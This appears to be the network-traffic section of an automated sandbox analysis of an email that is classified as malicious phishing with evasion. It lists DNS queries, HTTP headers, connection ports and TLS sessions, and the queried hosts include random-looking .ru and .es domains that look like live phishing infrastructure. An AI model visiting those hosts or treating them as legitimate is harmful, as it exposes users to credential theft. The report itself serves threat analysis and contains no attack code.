Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: luyubb.uishkfyv.ru
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: ok4static.oktacdn.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: get.geojs.io
Source: global traffic	DNS traffic detected: DNS query: wkvobqmz1nlx3y95jroh8g2z0rra9wbwvxxeztkc3csozvswko3mgf6g.wnzmrp.es

Source: unknown

HTTP traffic detected: POST /report/v4?s=fD83r1sApu020X%2FxJGhI0q8lA%2BSJPsVjm6SADU1uriXGiDKvQoeAEWpk4KT9Z1ULe0gUK%2BmXHWZgXAPjPzrO%2FCgzXBPyW9ls3s0ZgfyZME8yT0%2FKhWjMwIWtcuR%2F3C0KzvPD HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 428Content-Type: application/reports+jsonOrigin: https://ul4.rxguzqe.esUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 19:54:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fD83r1sApu020X%2FxJGhI0q8lA%2BSJPsVjm6SADU1uriXGiDKvQoeAEWpk4KT9Z1ULe0gUK%2BmXHWZgXAPjPzrO%2FCgzXBPyW9ls3s0ZgfyZME8yT0%2FKhWjMwIWtcuR%2F3C0KzvPD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=15881&min_rtt=15850&rtt_var=4483&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2820&recv_bytes=2236&delivery_rate=254997&cwnd=250&unsent_bytes=0&cid=7f8c24a37764f866&ts=44&x=0"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 9305c109f83d2089-MIAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=121171&min_rtt=120910&rtt_var=25771&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1895&delivery_rate=33391&cwnd=252&unsent_bytes=0&cid=c5a0b9f8caff4f50&ts=2824&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 19:54:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: cloudflareCf-Cache-Status: DYNAMICVary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tlt0FpXM8keLQol9v88e%2Bdx76rEovJ493wAj9OKSh%2FOCvYoLYzeE9zFD3dSJBPDoOv4NQp3vZX6C08akunL3t42x3cdo3%2BfHn5rOLYSz8Fx62RSQltE2Fl%2Bc43z4Qv1ISxAc"}],"group":"cf-nel","max_age":604800}Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server-Timing: cfL4;desc="?proto=TCP&rtt=309&min_rtt=281&rtt_var=131&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2821&recv_bytes=2040&delivery_rate=8907488&cwnd=252&unsent_bytes=0&cid=46fcade817b106bc&ts=166&x=0"CF-RAY: 9305c13ae9438da3-MIAalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 19:54:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fa9iC%2ByLcNInf%2F2BDj5MvLL5XUxWZK32IUMsW3ytUUKVAoSeMQEjA8gus3rtUOE7Y3CBNV4sNnofKVz3JD8vmJINdW2c4PVe5GkEQVS8GTymzXy7HS5YrWR6vIjw6Xz%2Ff%2BVp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=15836&min_rtt=15693&rtt_var=4540&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2820&recv_bytes=2069&delivery_rate=257612&cwnd=252&unsent_bytes=0&cid=17c4bbd5a28dbe5f&ts=185&x=0"Server: cloudflareCF-RAY: 9305c1470f87745d-MIAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=127700&min_rtt=127500&rtt_var=27197&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1727&delivery_rate=31519&cwnd=243&unsent_bytes=0&cid=a2400a9ae3a46d9b&ts=668&x=0"

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443

Source: unknown	HTTPS traffic detected: 104.47.75.156:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.47.75.156:443 -> 192.168.2.16:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.47.75.156:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.14.248.71:443 -> 192.168.2.16:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.23.62.204:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.123:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.123:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.23.62.204:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.99:443 -> 192.168.2.16:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.16:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.7.130:443 -> 192.168.2.16:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.112.3:443 -> 192.168.2.16:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.164.78.67:443 -> 192.168.2.16:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.164.78.67:443 -> 192.168.2.16:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.164.78.67:443 -> 192.168.2.16:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.123:443 -> 192.168.2.16:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.16:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.164.78.67:443 -> 192.168.2.16:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.16:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.16:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.16:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.16:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.99:443 -> 192.168.2.16:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49809 version: TLS 1.2

Source: classification engine

Classification label: mal100.phis.evad.winEML@46/62@43/201